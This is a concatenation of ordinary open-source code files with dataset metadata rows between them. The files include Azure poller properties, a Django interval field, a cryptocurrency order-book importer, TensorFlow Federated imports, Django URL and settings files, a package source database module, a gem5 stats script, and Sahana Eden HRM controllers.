def created_on(self) -> datetime.datetime:
"""When your analyze job was created
:return: When your analyze job was created
:rtype: ~datetime.datetime
"""
return self.polling_method().created_on
@property
def display_name(self) -> Optional[str]:
"""The display name of your :func:`begin_analyze_actions` call.
Corresponds to the `display_name` kwarg you pass to your
:func:`begin_analyze_actions` call.
:return: The display name of your :func:`begin_analyze_actions` call.
:rtype: str
"""
return self.polling_method().display_name
@property
def expires_on(self) -> datetime.datetime:
"""When your analyze job will expire
:return: When your analyze job will expire
:rtype: ~datetime.datetime
"""
return self.polling_method().expires_on
@property
def actions_failed_count(self) -> int:
"""Total number of actions that have failed
:return: Total number of actions that have failed
:rtype: int
"""
return self.polling_method().actions_failed_count
@property
def actions_in_progress_count(self) -> int:
"""Total number of actions currently in progress
:return: Total number of actions currently in progress
:rtype: int
"""
return self.polling_method().actions_in_progress_count
@property
def actions_succeeded_count(self) -> int:
"""Total number of actions that succeeded
:return: Total number of actions that succeeded
:rtype: int
"""
return self.polling_method().actions_succeeded_count
@property
def last_modified_on(self) -> datetime.datetime:
"""The last time your actions results were updated
:return: The last time your actions results were updated
:rtype: ~datetime.datetime
"""
return self.polling_method().last_modified_on
@property
def total_actions_count(self) -> int:
"""Total number of actions you submitted
:return: Total number of actions submitted
:rtype: int
"""
return self.polling_method().total_actions_count
@property
def id(self) -> str:
"""ID of your :func:`begin_analyze_actions` call.
:return: ID of your :func:`begin_analyze_actions` call.
:rtype: str
"""
return self.polling_method().id
| mit | -4,780,159,262,981,646,000 | 31.844828 | 118 | 0.636308 | false |
dbservice/dbservice | dbservice/apps/utils/fields.py | 1 | 5914 | import re
from dateutil.relativedelta import relativedelta
from django.core.exceptions import ValidationError
from django.db import models
from django.utils.translation import ugettext_lazy as _
import psycopg2.extensions
def _parse_opt_num(s):
if not s:
# For the ISO 8601 duration specifications, fields need not be
# explicitly included if their value is zero --- None from regexp
# should become 0.
return 0
try:
# Prefer integers. Only last specified field is allowed to contain a
# fractional part, though we don't explicitly check this.
# TODO: Check; is this still necessary/relevant/preferable to using
# float() for all fields?
return int(s)
except ValueError:
return float(s.replace(',', '.'))
# PnW
ISO_WEEK_RX = re.compile(
r'^P(\d+(?:[.,]\d*)?)W$')
# P[nY][nM][nD][T[nH][nM][nS]]
ISO_RX = re.compile(
r'^P'
r'(?:(\d+(?:[.,]\d*)?)Y)?' # year
r'(?:(\d+(?:[.,]\d*)?)M)?' # month
r'(?:(\d+(?:[.,]\d*)?)D)?' # day
r'(?:T' # start optional time part
r'(?:(\d+(?:[.,]\d*)?)H)?' # hour
r'(?:(\d+(?:[.,]\d*)?)M)?' # minute
r'(?:(\d+(?:[.,]\d*)?)S)?' # second
r')?' # end optional time part
r'$')
def _iso8601_to_relativedelta(s):
"""
Parse a duration specification in the accepted ISO 8601 formats
'PnYnMnDTnHnMnS' or 'PnW' to a ``relativedelta`` object.
"""
match = ISO_RX.match(s)
if match:
years, months, days, hours, minutes, seconds = \
[_parse_opt_num(n) for n in match.groups()]
return relativedelta(
years=years, months=months, days=days,
hours=hours, minutes=minutes, seconds=seconds)
match = ISO_WEEK_RX.match(s)
if match:
weeks = _parse_opt_num(match.groups()[0])
return relativedelta(weeks=weeks)
raise ValueError('Invalid ISO 8601 duration string %s' % s)
def _relativedelta_to_iso8601(val):
"""
Construct an ISO 8601 duration specification string from the provided
``relativedelta`` object.
"""
if val.leapdays:
raise ValueError('"leapdays" not representable')
if any([getattr(val, f) is not None for f in (
'year', 'month', 'day', 'weekday',
'hour', 'minute', 'second', 'microsecond')]):
raise ValueError(
'relativedelta {} represents an absoluet timestamp; '
'not a duration'.format(val))
seconds = val.seconds
if val.microseconds:
seconds += val.microseconds / 1000000.0
return 'P{years}Y{months}M{days}DT{hours}H{minutes}M{seconds}S'.format(
years=val.years, months=val.months, days=val.days,
hours=val.hours, minutes=val.minutes, seconds=seconds)
# [Y year[s]] [M mon[s]] [D day[s]] [HH:MM:SS[.s*]
POSTGRES_RX = re.compile(
r'^'
r'(?:(\d+) years? ?)?'
r'(?:(\d+) mons? ?)?'
r'(?:(\d+) days? ?)?'
r'(?:' # start optional time part
r'(\d+):(\d+):(\d+(?:\.\d*)?)'
r')?' # end optional time part
r'$')
def _postgres_to_relativedelta(s):
"""
Parse interval output in the default "postgres" style for PostgreSQL into a
``relativedelta``.
"""
match = POSTGRES_RX.match(s)
if match:
years, months, days, hours, minutes, seconds = [
_parse_opt_num(n) for n in match.groups()]
return relativedelta(
years=years, months=months, days=days,
hours=hours, minutes=minutes, seconds=seconds)
raise ValueError('Unrecognized postgres interval string \'%s\'' % s)
# Set "output" type for INTERVALs from the DB to be relativedelta.
INTERVAL2RELATIVEDELTA = psycopg2.extensions.new_type(
psycopg2.extensions.INTERVAL.values,
'INTERVAL2RELATIVEDELTA',
lambda value, curs:
_postgres_to_relativedelta(value) if value is not None else None)
psycopg2.extensions.register_type(INTERVAL2RELATIVEDELTA)
# Set conversion of relativedelta on "input" to the DB to be an appropriate ISO
# 8601 duration string.
def _adapt_relativedelta(val):
return psycopg2.extensions.AsIs("'{}'".format(
_relativedelta_to_iso8601(val)))
psycopg2.extensions.register_adapter(relativedelta, _adapt_relativedelta)
class IntervalField(models.Field):
description = 'A time interval'
__metaclass__ = models.SubfieldBase
default_error_messages = {
'invalid': _("'%s' value has an invalid format. It must be in "
"ISO 8601 duration (PnYnMnDTnHnMnS or PnW) format."),
}
def db_type(self, connection):
if connection.settings_dict['ENGINE'] != \
'django.db.backends.postgresql_psycopg2':
raise NotImplementedError('only implemented for PostgreSQL')
return 'interval'
def to_python(self, value):
if isinstance(value, relativedelta):
return value
if value is None or value == '':
return None
try:
return _iso8601_to_relativedelta(value)
except ValueError:
# any parse error becomes the same "invalid" error...
msg = self.error_messages['invalid'] % value
raise ValidationError(msg)
def get_db_prep_value(self, value, connection, prepared=False):
if connection.settings_dict['ENGINE'] != \
'django.db.backends.postgresql_psycopg2':
raise NotImplementedError('only implemented for PostgreSQL')
return super().get_db_prep_value(
value, connection, prepared)
def value_to_string(self, obj):
value = self._get_val_from_obj(obj)
if value is None:
return ''
else:
return _relativedelta_to_iso8601(value)
try:
from south.modelsinspector import add_introspection_rules
add_introspection_rules(
[],
[r'^dbservice\.apps\.utils\.fields\.IntervalField'])
except ImportError:
pass
| mit | 987,401,872,882,005,600 | 32.412429 | 79 | 0.609063 | false |
rnicoll/cryptocurrency-market-data | old/load_data_vtc.py | 1 | 3580 | #!/usr/bin/python3.2
import pymongo
from datetime import datetime
import json
from os import listdir, remove
from os.path import isdir, isfile, join
from pymongo import MongoClient
import pprint
class ExchangeError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
def importCryptsy(bid_currency, quote_currency, book_data, content, file_time):
if (content['success'] != 1):
raise ExchangeError('Unsuccessful response from Cryptsy')
if (not isinstance(content['return'], dict)):
raise ExchangeError('No object in response from Cryptsy')
market_data = content['return'][bid_currency]
asks = []
bids = []
if (isinstance(market_data['sellorders'], list)):
for order in market_data['sellorders']:
asks.append([order['price'], order['quantity']])
if (isinstance(market_data['buyorders'], list)):
for order in market_data['buyorders']:
bids.append([order['price'], order['quantity']])
book = {"bid_currency": bid_currency,
"quote_currency": quote_currency,
"exchange": "Cryptsy",
"time": file_time,
"asks": asks,
"bids": bids}
book_data.insert(book)
def importVircurex(bid_currency, quote_currency, book_data, content, file_time):
book = {"bid_currency": bid_currency,
"quote_currency": quote_currency,
"exchange": "Vircurex",
"time": file_time,
"asks": content["asks"],
"bids": content["bids"]}
book_data.insert(book)
client = MongoClient()
market_data_db = client.market_data
imported_files = market_data_db.imported_files
book_data = market_data_db.book
base_dir = "/home/jrn/cryptocurrency_data/vtc_book_data"
pp = pprint.PrettyPrinter(indent=4)
for hour in [ d for d in listdir(base_dir) if isdir(join(base_dir, d)) ]:
hour_dir = join(base_dir, hour)
for exchange in [ d for d in listdir(hour_dir) if isdir(join(hour_dir, d)) ]:
exchange_dir = join(hour_dir, exchange)
for data_file in [ f for f in listdir(exchange_dir) if isfile(join(exchange_dir, f)) ]:
file_path = join(exchange_dir, data_file)
file_time = datetime.strptime(data_file, "%Y-%m-%dT%H:%M+0000.json")
existing_file = imported_files.find_one({"market": "VTC/BTC",
"exchange": exchange,
"filename": data_file})
if (existing_file):
print("File " + file_path + " already imported.")
continue
imported_file = {"market": "VTC/BTC",
"exchange": exchange,
"filename": data_file}
try:
with open(file_path, 'r') as f:
content = json.load(f)
except ValueError:
print ("File " + file_path + " contains is not valid JSON.")
remove(file_path)
continue
try:
object_id = imported_files.insert(imported_file)
if (exchange == "Cryptsy"):
importCryptsy("VTC", "BTC", book_data, content, file_time)
elif (exchange == "Vircurex"):
importVircurex("VTC", "BTC", book_data, content, file_time)
except KeyError as e:
print ("File " + file_path + " is invalid, missing key: " + str(e))
continue
except ExchangeError:
print ("File " + file_path + " is not a valid dataset.")
continue
| mit | -6,724,503,697,391,267,000 | 33.095238 | 95 | 0.575419 | false |
tensorflow/federated | tensorflow_federated/python/core/framework/__init__.py | 1 | 4934 | # Copyright 2018, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Libraries for extending the TensorFlow Federated core library."""
from tensorflow_federated.python.core.impl.compiler.building_blocks import ComputationBuildingBlock
from tensorflow_federated.python.core.impl.compiler.intrinsic_reductions import replace_intrinsics_with_bodies
from tensorflow_federated.python.core.impl.compiler.tree_to_cc_transformations import TFParser
from tensorflow_federated.python.core.impl.computation.computation_serialization import deserialize_computation
from tensorflow_federated.python.core.impl.computation.computation_serialization import serialize_computation
from tensorflow_federated.python.core.impl.context_stack.context_base import Context
from tensorflow_federated.python.core.impl.context_stack.context_stack_base import ContextStack
from tensorflow_federated.python.core.impl.context_stack.get_context_stack import get_context_stack
from tensorflow_federated.python.core.impl.context_stack.set_default_context import set_default_context
from tensorflow_federated.python.core.impl.executors.caching_executor import CachingExecutor
from tensorflow_federated.python.core.impl.executors.cardinality_carrying_base import CardinalityCarrying
from tensorflow_federated.python.core.impl.executors.data_backend_base import DataBackend
from tensorflow_federated.python.core.impl.executors.data_executor import DataExecutor
from tensorflow_federated.python.core.impl.executors.eager_tf_executor import EagerTFExecutor
from tensorflow_federated.python.core.impl.executors.execution_context import ExecutionContext
from tensorflow_federated.python.core.impl.executors.executor_base import Executor
from tensorflow_federated.python.core.impl.executors.executor_factory import ExecutorFactory
from tensorflow_federated.python.core.impl.executors.executor_serialization import deserialize_value
from tensorflow_federated.python.core.impl.executors.executor_serialization import serialize_value
from tensorflow_federated.python.core.impl.executors.executor_service import ExecutorService
from tensorflow_federated.python.core.impl.executors.executor_stacks import local_executor_factory
from tensorflow_federated.python.core.impl.executors.executor_stacks import remote_executor_factory
from tensorflow_federated.python.core.impl.executors.executor_stacks import ResourceManagingExecutorFactory
from tensorflow_federated.python.core.impl.executors.executor_stacks import SizeInfo
from tensorflow_federated.python.core.impl.executors.executor_stacks import sizing_executor_factory
from tensorflow_federated.python.core.impl.executors.executor_stacks import SizingExecutorFactory
from tensorflow_federated.python.core.impl.executors.executor_stacks import thread_debugging_executor_factory
from tensorflow_federated.python.core.impl.executors.executor_value_base import ExecutorValue
from tensorflow_federated.python.core.impl.executors.federated_composing_strategy import FederatedComposingStrategy
from tensorflow_federated.python.core.impl.executors.federated_resolving_strategy import FederatedResolvingStrategy
from tensorflow_federated.python.core.impl.executors.federating_executor import FederatingExecutor
from tensorflow_federated.python.core.impl.executors.federating_executor import FederatingStrategy
from tensorflow_federated.python.core.impl.executors.ingestable_base import Ingestable
from tensorflow_federated.python.core.impl.executors.reference_resolving_executor import ReferenceResolvingExecutor
from tensorflow_federated.python.core.impl.executors.remote_executor import RemoteExecutor
from tensorflow_federated.python.core.impl.executors.thread_delegating_executor import ThreadDelegatingExecutor
from tensorflow_federated.python.core.impl.executors.transforming_executor import TransformingExecutor
from tensorflow_federated.python.core.impl.types.type_analysis import contains as type_contains
from tensorflow_federated.python.core.impl.types.type_conversions import type_from_tensors
from tensorflow_federated.python.core.impl.types.type_conversions import type_to_tf_tensor_specs
from tensorflow_federated.python.core.impl.types.type_serialization import deserialize_type
from tensorflow_federated.python.core.impl.types.type_serialization import serialize_type
from tensorflow_federated.python.core.impl.wrappers.computation_wrapper_instances import building_block_to_computation
| apache-2.0 | 1,430,327,673,342,203,000 | 84.068966 | 118 | 0.861775 | false |
carpedm20/movieduk | movieduk/urls.py | 1 | 2693 | from django.conf.urls import patterns, include, url
#import autocomplete_light
#autocomplete_light.autodiscover()
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
from movieduk import settings
urlpatterns = patterns('',
#(r'^account/', include('account.urls')),
(r'^media/(?P<path>.*)$', 'django.views.static.serve',{'document_root': settings.MEDIA_ROOT}),
(r'^asset/(?P<path>.*)$', 'django.views.static.serve',{'document_root': settings.ASSET_ROOT}),
url(r'^api/get_info/', 'core.views.get_info', name='get_info'),
url(r'^api/get_search_list/', 'core.views.get_search_list', name='get_search_list'),
url(r'^api/get_list/', 'core.views.get_list', name='get_list'),
url(r'^api/get_short_list/', 'core.views.get_short_list', name='get_short_list'),
url(r'^freetalk', 'account.views.free', name='index'),
url(r'^rank', 'rank.views.index', name='index'),
url(r'^api/get_rank/', 'rank.views.get_rank', name='get_rank'),
url(r'^api/is_login', 'account.views.is_login', name='is_login'),
url(r'^api/check_movie', 'account.views.check_movie', name='check_movie'),
url(r'^profile/(?P<un>.*)', 'account.views.profile', name='profile'),
url(r'^social', 'account.views.social', name='social'),
url( r'upload$', 'core.views.upload', name = 'jfu_upload' ),
url( r'^delete/(?P<pk>\d+)$', 'core.views.upload_delete', name = 'jfu_delete' ),
#url(r'', include('social_auth.urls')),
url(r'^login', 'account.views.sign_in'),
url(r'^logout', 'account.views.sign_out'),
url(r'^admin/', include(admin.site.urls)),
url(r'^movieduk', 'core.views.movieduk'),
url(r'^$', 'core.views.index'),
url(r'^short', 'core.views.index_short'),
url(r'^index$', 'core.views.index'),
url(r'^random', 'core.views.random', name='index'),
url(r'^watch', 'core.views.movie_search', name='movie_search'),
url(r'^search/movie/(?P<option>\w+)', 'core.views.movie_search', name='movie_search'),
url(r'^filter', 'core.views.movie_filter'),
url(r'^filter/short', 'core.views.movie_filter'),
url(r'^info/director/(?P<code>\d+)', 'core.views.director_info'),
url(r'^info/actor/(?P<code>\d+)', 'core.views.actor_info'),
url(r'^info/movie/(?P<code>\d+)', 'core.views.movie_info'),
#url(r'autocomplete/', include('autocomplete_light.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
# url(r'^admin/', include(admin.site.urls)),
)
| mit | 7,963,817,386,544,378,000 | 42.883333 | 98 | 0.62384 | false |
hknyldz/pisitools | pisilinux/pisilinux/db/sourcedb.py | 1 | 4805 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2005 - 2011, TUBITAK/UEKAE
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# Please read the COPYING file.
#
import re
import gzip
import piksemel
import pisilinux
import pisilinux.specfile
import pisilinux.db.lazydb as lazydb
class SourceDB(lazydb.LazyDB):
def __init__(self):
lazydb.LazyDB.__init__(self, cacheable=True)
def init(self):
self.__source_nodes = {}
self.__pkgstosrc = {}
self.__revdeps = {}
repodb = pisilinux.db.repodb.RepoDB()
for repo in repodb.list_repos():
doc = repodb.get_repo_doc(repo)
self.__source_nodes[repo], self.__pkgstosrc[repo] = self.__generate_sources(doc)
self.__revdeps[repo] = self.__generate_revdeps(doc)
self.sdb = pisilinux.db.itembyrepo.ItemByRepo(self.__source_nodes, compressed=True)
self.psdb = pisilinux.db.itembyrepo.ItemByRepo(self.__pkgstosrc)
self.rvdb = pisilinux.db.itembyrepo.ItemByRepo(self.__revdeps)
def __generate_sources(self, doc):
sources = {}
pkgstosrc = {}
for spec in doc.tags("SpecFile"):
src_name = spec.getTag("Source").getTagData("Name")
sources[src_name] = gzip.zlib.compress(spec.toString())
for package in spec.tags("Package"):
pkgstosrc[package.getTagData("Name")] = src_name
return sources, pkgstosrc
def __generate_revdeps(self, doc):
revdeps = {}
for spec in doc.tags("SpecFile"):
name = spec.getTag("Source").getTagData("Name")
deps = spec.getTag("Source").getTag("BuildDependencies")
if deps:
for dep in deps.tags("Dependency"):
revdeps.setdefault(dep.firstChild().data(), set()).add((name, dep.toString()))
return revdeps
def list_sources(self, repo=None):
return self.sdb.get_item_keys(repo)
def which_repo(self, name):
return self.sdb.which_repo(self.pkgtosrc(name))
def which_source_repo(self, name):
source = self.pkgtosrc(name)
return source, self.sdb.which_repo(source)
def has_spec(self, name, repo=None):
return self.sdb.has_item(name, repo)
def get_spec(self, name, repo=None):
spec, repo = self.get_spec_repo(name, repo)
return spec
def search_spec(self, terms, lang=None, repo=None, fields=None, cs=False):
"""
fields (dict) : looks for terms in the fields which are marked as True
If the fields is equal to None this method will search in all fields
example :
if fields is equal to : {'name': True, 'summary': True, 'desc': False}
This method will return only package that contents terms in the package
name or summary
"""
resum = '<Summary xml:lang=.(%s|en).>.*?%s.*?</Summary>'
redesc = '<Description xml:lang=.(%s|en).>.*?%s.*?</Description>'
if not fields:
fields = {'name': True, 'summary': True, 'desc': True}
if not lang:
lang = pisilinux.pxml.autoxml.LocalText.get_lang()
found = []
for name, xml in self.sdb.get_items_iter(repo):
if terms == [term for term in terms if (fields['name'] and \
re.compile(term, re.I).search(name)) or \
(fields['summary'] and \
re.compile(resum % (lang, term), 0 if cs else re.I).search(xml)) or \
(fields['desc'] and \
re.compile(redesc % (lang, term), 0 if cs else re.I).search(xml))]:
found.append(name)
return found
def get_spec_repo(self, name, repo=None):
src, repo = self.sdb.get_item_repo(name, repo)
spec = pisilinux.specfile.SpecFile()
spec.parse(src)
return spec, repo
def pkgtosrc(self, name, repo=None):
return self.psdb.get_item(name, repo)
def get_rev_deps(self, name, repo=None):
try:
rvdb = self.rvdb.get_item(name, repo)
except Exception: #FIXME: what exception could we catch here, replace with that.
return []
rev_deps = []
for pkg, dep in rvdb:
node = piksemel.parseString(dep)
dependency = pisilinux.dependency.Dependency()
dependency.package = node.firstChild().data()
if node.attributes():
attr = node.attributes()[0]
dependency.__dict__[attr] = node.getAttribute(attr)
rev_deps.append((pkg, dependency))
return rev_deps
| gpl-3.0 | -6,640,202,832,901,699,000 | 35.12782 | 98 | 0.589802 | false |
bcheung92/Paperproject | gem5/pyscript/cachecmp.py | 1 | 2915 | #!/usr/bin/env python
import sys
import re
import os
inFilename = sys.argv[1]
if os.path.isfile(inFilename):
namelength = inFilename.rfind(".")
name = inFilename[0:namelength]
exten = inFilename[namelength:]
outFilename = name+"-cachecmp"+exten
print "inFilename:", inFilename
print "outFilename:", outFilename
fpRead = open(inFilename, "r")
fpWrite = open(outFilename, "w+")
dtbwalker1Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus0.dtb.walker).* ([0-9]+)')
dtbwalker2Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus1.dtb.walker).* ([0-9]+)')
itbwalker1Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus0.itb.walker).* ([0-9]+)')
itbwalker2Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus1.itb.walker).* ([0-9]+)')
overallhitsPattern = re.compile(r'.*(l2.overall_hits::total).* ([0-9]+)')
cachehitsPattern = re.compile(r'.*(l2.cachehits).* ([0-9]+)')
threadbeginPattern = re.compile(r'.*Begin Simulation Statistics.*')
threadendPattern =re.compile(r'.*End Simulation Statistics.*')
lines = fpRead.readline()
while lines:
threadbeginmatch = threadbeginPattern.match(lines)
if threadbeginmatch:
dtbwalker1=0
itbwalker1=0
dtbwalker2=0
itbwalker2=0
overallhits=0
cachehits=0
gem5hits=0
ratio = 0
threadlines = fpRead.readline()
while threadlines:
dtbwalker1match = dtbwalker1Pattern.search(threadlines)
itbwalker1match = itbwalker1Pattern.search(threadlines)
dtbwalker2match = dtbwalker2Pattern.search(threadlines)
itbwalker2match = itbwalker2Pattern.search(threadlines)
overallhitsmatch = overallhitsPattern.search(threadlines)
cachehitsmatch = cachehitsPattern.search(threadlines)
threadendmatch = threadendPattern.match(threadlines)
if dtbwalker1match:
dtbwalker1=int(dtbwalker1match.group(2))
if itbwalker1match:
itbwalker1=int(itbwalker1match.group(2))
if dtbwalker2match:
dtbwalker2=int(dtbwalker2match.group(2))
if itbwalker2match:
itbwalker2=int(itbwalker2match.group(2))
if overallhitsmatch:
overallhits=int(overallhitsmatch.group(2))
if cachehitsmatch:
cachehits=int(cachehitsmatch.group(2))
if threadendmatch:
gem5hits=overallhits-(dtbwalker1+dtbwalker2+itbwalker1+itbwalker2)
absval = abs(gem5hits-cachehits)
if gem5hits!=0:
ratio=(absval/float(gem5hits))*100
else:
ratio=float(0)
fpWrite.write("gem5hit %d " % gem5hits)
fpWrite.write("cachehit %d " % cachehits)
fpWrite.write("ratio %.2f%%" % ratio)
fpWrite.write("\n")
break
threadlines = fpRead.readline()
lines = fpRead.readline()
fpRead.close()
fpWrite.close()
| mit | 374,115,436,903,597,250 | 37.866667 | 90 | 0.651115 | false |
pbs/django-filer | filer/test_settings.py | 1 | 2981 | # -*- coding: utf-8 -*-
import os
import filer
DEBUG = True
PACKAGE_ROOT = os.path.abspath(os.path.join(
os.path.dirname(filer.__file__), '..'))
TMP_ROOT = os.path.abspath(os.path.join(PACKAGE_ROOT, 'tmp'))
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(TMP_ROOT, 'filer_test.sqlite3'),
},
}
INSTALLED_APPS = [
'filer',
'mptt',
'easy_thumbnails',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sites',
'django.contrib.admin',
'django.contrib.sessions',
'django.contrib.staticfiles',
'cms',
'menus',
'sekizai',
'cmsroles',
]
ROOT_URLCONF = 'filer.test_urls'
SITE_ID = 1
MEDIA_ROOT = os.path.abspath(os.path.join(TMP_ROOT, 'media'))
MEDIA_URL = '/media/'
STATIC_URL = '/static/'
USE_TZ = False # because of a bug in easy-thumbnails 1.0.3
MIDDLEWARE_CLASSES = (
'django.middleware.cache.UpdateCacheMiddleware',
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'cms.middleware.user.CurrentUserMiddleware',
)
CMS_TEMPLATES = [('cms_mock_template.html', 'cms_mock_template.html')]
SEKIZAI_IGNORE_VALIDATION = True
CMS_MODERATOR = True
CMS_PERMISSION = True
CACHE_BACKEND = 'locmem:///'
SECRET_KEY = 'secret'
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'OPTIONS': {
'context_processors': (
"django.contrib.auth.context_processors.auth",
'django.contrib.messages.context_processors.messages',
"django.template.context_processors.i18n",
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.template.context_processors.media",
'django.template.context_processors.csrf',
"cms.context_processors.media",
"sekizai.context_processors.sekizai",
"django.template.context_processors.static",
),
'loaders': (
'filer.tests.utils.MockLoader',
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
),
'debug': False
},
},
]
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'simple': {
'format': '%(levelname)s %(module)s %(message)s'
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
},
'root': {
'handlers': ['console', ],
'level': 'WARNING',
},
}
| bsd-3-clause | -3,890,502,775,433,293,300 | 27.122642 | 70 | 0.598792 | false |
ScottBuchanan/eden | controllers/hrm.py | 1 | 25684 | # -*- coding: utf-8 -*-
"""
Human Resource Management
"""
module = request.controller
resourcename = request.function
if not settings.has_module(module):
raise HTTP(404, body="Module disabled: %s" % module)
s3db.hrm_vars()
# =============================================================================
def index():
""" Module Home Page """
mode = session.s3.hrm.mode
if mode is not None:
# Go to Personal Profile
s3_redirect_default(URL(f="person"))
else:
# Bypass home page & go direct to searchable list of Staff
s3_redirect_default(URL(f="staff", args="summary"))
# =============================================================================
# People
# =============================================================================
def human_resource():
"""
HR Controller
- combined Staff/Volunteers
Used for Summary view, Imports and S3AddPersonWidget2
"""
return s3db.hrm_human_resource_controller()
# -----------------------------------------------------------------------------
def staff():
""" Staff Controller """
# Staff only
s3.filter = FS("type") == 1
def prep(r):
table = r.table
tablename = r.tablename
get_vars = r.get_vars
# Use CRUD strings for staff
crud_strings = s3.crud_strings
crud_strings[tablename] = crud_strings["hrm_staff"]
resource = r.resource
if "expiring" in get_vars:
# Filter for staff with contracts expiring in the next 4 weeks
query = FS("end_date") < \
(request.utcnow + datetime.timedelta(weeks=4))
resource.add_filter(query)
# Adapt CRUD strings
crud_strings[tablename].title_list = \
T("Staff with Contracts Expiring in the next Month")
# Reconfigure
resource.configure(# Sort by Expiry
sortby = table.end_date,
# Remove the Add button
insertable=False
)
# Adapt list_fields
list_fields = [(T("Contract End Date"), "end_date"),
"person_id",
"job_title_id",
"organisation_id",
"department_id",
"site_id",
#"site_contact",
]
else:
# Adapt list_fields
list_fields = ["person_id",
"job_title_id",
"organisation_id",
"department_id",
"site_id",
#"site_contact",
(T("Email"), "email.value"),
(settings.get_ui_label_mobile_phone(), "phone.value"),
]
if settings.get_hrm_use_trainings():
list_fields.append("person_id$training.course_id")
if settings.get_hrm_use_certificates():
list_fields.append("person_id$certification.certificate_id")
list_fields.append((T("Contract End Date"), "end_date"))
list_fields.append("status")
resource.configure(list_fields = list_fields)
if r.interactive:
if r.id:
if r.method not in ("profile", "delete"):
# Redirect to person controller
vars = {
"human_resource.id": r.id,
"group": "staff"
}
args = []
if r.representation == "iframe":
vars["format"] = "iframe"
args = [r.method]
redirect(URL(f="person", vars=vars, args=args))
else:
if r.method == "import":
# Redirect to person controller
redirect(URL(f="person",
args="import",
vars={"group": "staff"}))
elif not r.component and r.method != "delete":
# Configure site_id
field = table.site_id
site_id = get_vars.get("site_id", None)
if site_id:
field.default = site_id
field.writable = False
field.comment = DIV(DIV(_class="tooltip",
_title="%s|%s" % (
settings.get_org_site_label(),
T("The facility where this position is based."),
#messages.AUTOCOMPLETE_HELP,
)))
#field.comment = S3AddResourceLink(c="org", f="facility",
# vars = dict(child="site_id",
# parent="req"),
# title=T("Add New Site"),
# )
# Hide status field
table.status.writable = table.status.readable = False
# Assume staff only between 16-81
s3db.pr_person.date_of_birth.widget = S3DateWidget(past=972,
future=-192)
elif r.representation == "xls":
# Make it match Import sheets
list_fields = s3db.get_config(tablename, "list_fields")
# Remove "id" as XLS exporter doesn't like this not being first & has complicated skipping routines
try:
list_fields.remove("id")
except ValueError:
pass
# Separate Facility Type from Facility Name
table.site_id.represent = s3db.org_SiteRepresent(show_type = False)
i = 0
for f in list_fields:
i += 1
if f == "site_id":
break
list_fields.insert(i,
(T("Facility Type"),
"person_id$human_resource.site_id$instance_type"))
# Split person_id into first/middle/last
try:
list_fields.remove("person_id")
except ValueError:
pass
list_fields = ["person_id$first_name",
"person_id$middle_name",
"person_id$last_name",
] + list_fields
s3db.configure(tablename,
list_fields = list_fields)
return True
s3.prep = prep
def postp(r, output):
if r.interactive:
if not r.component:
# Set the minimum end_date to the same as the start_date
s3.jquery_ready.append(
'''S3.start_end_date('hrm_human_resource_start_date','hrm_human_resource_end_date')''')
s3_action_buttons(r, deletable=settings.get_hrm_deletable())
if "msg" in settings.modules and \
settings.get_hrm_compose_button() and \
auth.permission.has_permission("update", c="hrm", f="compose"):
# @ToDo: Remove this now that we have it in Events?
s3.actions.append(
{"url": URL(f="compose",
vars = {"human_resource.id": "[id]"}),
"_class": "action-btn send",
"label": str(T("Send Message"))
})
#s3.scripts.append("/%s/static/scripts/jquery.doubleScroll.js" % appname)
#s3.jquery_ready.append('''$('.dataTable_table').doubleScroll()''')
#s3.jquery_ready.append('''$('.dataTables_wrapper').doubleScroll()''')
elif r.representation == "plain":
# Map Popups
output = s3db.hrm_map_popup(r)
return output
s3.postp = postp
return s3_rest_controller("hrm", "human_resource")
# -----------------------------------------------------------------------------
def person():
"""
Person Controller
- used for access to component Tabs, Personal Profile & Imports
- includes components relevant to HRM
"""
return s3db.hrm_person_controller()
# -----------------------------------------------------------------------------
def profile():
"""
Profile Controller
- includes components relevant to HRM
"""
request.args = [str(s3_logged_in_person())]
# Custom Method for Contacts
s3db.set_method("pr", resourcename,
method = "contacts",
action = s3db.pr_Contacts)
if settings.has_module("asset"):
# Assets as component of people
s3db.add_components("pr_person",
asset_asset = "assigned_to_id",
)
group = get_vars.get("group", "staff")
# Configure human resource table
tablename = "hrm_human_resource"
table = s3db[tablename]
table.type.default = 1
# Configure person table
tablename = "pr_person"
table = s3db[tablename]
s3db.configure(tablename,
deletable = False,
)
# Configure for personal mode
s3.crud_strings[tablename].update(
title_display = T("Personal Profile"),
title_update = T("Personal Profile"))
# CRUD pre-process
def prep(r):
if r.interactive and r.method != "import":
if r.component:
if r.component_name == "physical_description":
# Hide all but those details that we want
# Lock all the fields
table = r.component.table
for field in table.fields:
table[field].writable = table[field].readable = False
# Now enable those that we want
table.ethnicity.writable = table.ethnicity.readable = True
